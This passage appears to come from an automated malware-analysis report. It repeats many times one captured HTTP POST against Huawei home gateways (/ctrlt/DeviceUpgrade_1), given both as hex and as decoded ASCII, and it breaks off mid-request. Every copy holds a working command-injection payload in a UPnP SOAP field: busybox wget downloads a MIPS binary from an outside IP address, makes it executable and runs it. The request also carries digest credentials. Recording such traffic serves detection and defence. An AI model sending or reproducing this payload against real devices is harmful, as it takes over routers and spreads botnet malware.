50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 